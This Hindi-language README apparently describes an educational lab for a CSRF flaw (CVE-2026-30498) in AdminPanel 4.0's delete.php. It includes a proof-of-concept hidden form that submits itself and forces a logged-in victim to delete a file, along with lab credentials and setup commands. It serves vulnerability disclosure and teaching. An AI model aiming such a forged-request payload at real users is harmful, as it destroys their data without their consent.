
शैक्षिक CSRF भेद्यता प्रदर्शन, एक नियंत्रित प्रयोगशाला वातावरण के साथ, जिसमें proof-of-concept एक्सप्लॉइट और उचित CSRF सुरक्षा वाला एक सुधारित संस्करण शामिल है।
CVE ID: CVE-2026-30498 (MITRE द्वारा आरक्षित)
खोजकर्ता: मेहदी बेन हमौ
AdminPanel 4.0 के delete.php एंडपॉइंट में एक क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) भेद्यता मौजूद है।
यह भेद्यता एक हमलावर को प्रमाणित उपयोगकर्ता की सहमति के बिना उसकी ओर से संवेदनशील क्रियाएं (फ़ाइल विलोपन) करने की अनुमति देती है।
यह भेद्यता CSRF सुरक्षा की अनुपस्थिति के कारण होती है:
कमजोर एंडपॉइंट अनुरोध के स्रोत को सत्यापित किए बिना सीधे उपयोगकर्ता सत्र के आधार पर अनुरोधों को संसाधित करता है।
सफल शोषण से निम्नलिखित होता है:
verifyPanel.php का विलोपनएक हमलावर एक दुर्भावनापूर्ण वेब पेज होस्ट करता है जो एक जाली अनुरोध भेजता है:
http://localhost:8080/delete.php?file=verifyPanel.php
जब कोई पीड़ित (प्रमाणित उपयोगकर्ता) इस पेज पर जाता है, तो ब्राउज़र स्वचालित रूप से सत्र कुकीज़ शामिल करता है, और अनुरोध निष्पादित हो जाता है।
<form id="csrfForm" action="http://localhost:8080/delete.php" method="GET">
<input type="hidden" name="file" value="verifyPanel.php">
</form>
<script>
document.getElementById("csrfForm").submit();
</script>
यह अनुरोध स्वचालित रूप से पीड़ित के सत्र कुकी के साथ भेजा जाता है।
php -S localhost:8080
http://localhost:8080
admin / admin123
http://localhost:8081/evil.html
/panel/dashboard.php
इस रिपॉजिटरी में भेद्यता को सुरक्षित रूप से पुनरुत्पादित करने के लिए एक नियंत्रित प्रयोगशाला वातावरण शामिल है।
महत्वपूर्ण: यह प्रयोगशाला एक सिमुलेशन है और यह मूल AdminPanel कोडबेस का सटीक प्रतिनिधित्व नहीं करती है।
वातावरण को रीसेट करने के लिए:
/reset.php
एक सुरक्षित संस्करण निम्नलिखित में लागू किया गया है:
delete_fixed.php
जोड़ी गई सुरक्षाएं:
victim/
├── index.php
├── delete.php
├── delete_fixed.php
├── reset.php
└── panel/
└── dashboard.php
attacker/
└── evil.html
यह परियोजना केवल शैक्षिक और शोध उद्देश्यों के लिए है।
उचित प्राधिकरण के बिना इस भेद्यता का उपयोग सिस्टम पर न करें।